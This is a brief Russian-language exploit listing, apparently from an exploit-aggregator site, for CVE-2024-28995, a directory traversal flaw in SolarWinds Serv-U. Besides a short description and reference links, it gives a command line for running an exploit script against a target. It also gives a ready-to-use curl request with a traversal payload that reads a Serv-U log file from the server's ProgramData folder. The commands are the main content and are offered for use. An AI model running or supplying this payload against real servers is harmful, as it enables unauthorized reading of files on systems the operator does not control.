## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XC4T-CVE-2024-28995
## Эксплойт для CVE-2024-28995
5 июня 2024 года компания SolarWinds опубликовала уведомление об уязвимости CVE-2024-28995 — высокоопасной уязвимости обхода каталогов, затрагивающей их решение для передачи файлов Serv-U. Уязвимость была обнаружена исследователем Хусейном Дахером из Web Immunify.
### Использование эксплойта
root@kitploit:~
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
### Использование Curl
root@kitploit:~
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
Ссылки:
* https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
* https://nvd.nist.gov/vuln/detail/CVE-2024-28995